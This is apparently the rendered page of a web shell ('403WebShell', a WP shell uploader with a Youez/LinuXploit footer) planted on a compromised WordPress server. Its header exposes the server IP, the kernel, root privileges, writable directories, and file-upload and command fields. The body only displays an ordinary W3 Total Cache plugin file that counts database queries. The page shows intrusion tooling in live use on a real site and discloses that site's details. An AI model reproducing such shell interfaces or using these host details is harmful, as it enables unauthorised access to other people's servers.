Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.216.149
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/ecocerowaste.com/htdocs/wp-content/plugins/w3-total-cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/ecocerowaste.com/htdocs/wp-content/plugins/w3-total-cache/UsageStatistics_Source_Wpdb.php
<?php
namespace W3TC;



/**
 * Provides statistics data about requests made to mysql server
 */
class UsageStatistics_Source_Wpdb {
	private $query_total = 0;



	static public function init() {
		$o = new UsageStatistics_Source_Wpdb();

		add_filter( 'query', array( $o, 'query' ) );
		add_action( 'w3tc_usage_statistics_of_request', array(
			$o, 'w3tc_usage_statistics_of_request' ), 10, 1 );
		add_filter( 'w3tc_usage_statistics_metrics', array(
			$o, 'w3tc_usage_statistics_metrics' ) );
		add_filter( 'w3tc_usage_statistics_summary_from_history', array(
			$o, 'w3tc_usage_statistics_summary_from_history' ), 10, 2 );
	}



	public function w3tc_usage_statistics_metrics( $metrics ) {
		return array_merge( $metrics, array( 'wpdb_calls_total' ) );
	}



	public function w3tc_usage_statistics_summary_from_history( $summary, $history ) {
		// counters
		$wpdb_calls_total = Util_UsageStatistics::sum( $history,
			'wpdb_calls_total' );

		$summary['wpdb'] = array(
			'calls_total' => Util_UsageStatistics::integer(
				$wpdb_calls_total ),
			'calls_per_second' => Util_UsageStatistics::value_per_period_seconds(
				$wpdb_calls_total, $summary )
		);

		return $summary;
	}



	public function w3tc_usage_statistics_of_request( $storage ) {
		$storage->counter_add( 'wpdb_calls_total', $this->query_total );
	}



	public function query( $q ) {
		$this->query_total++;
		return $q;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit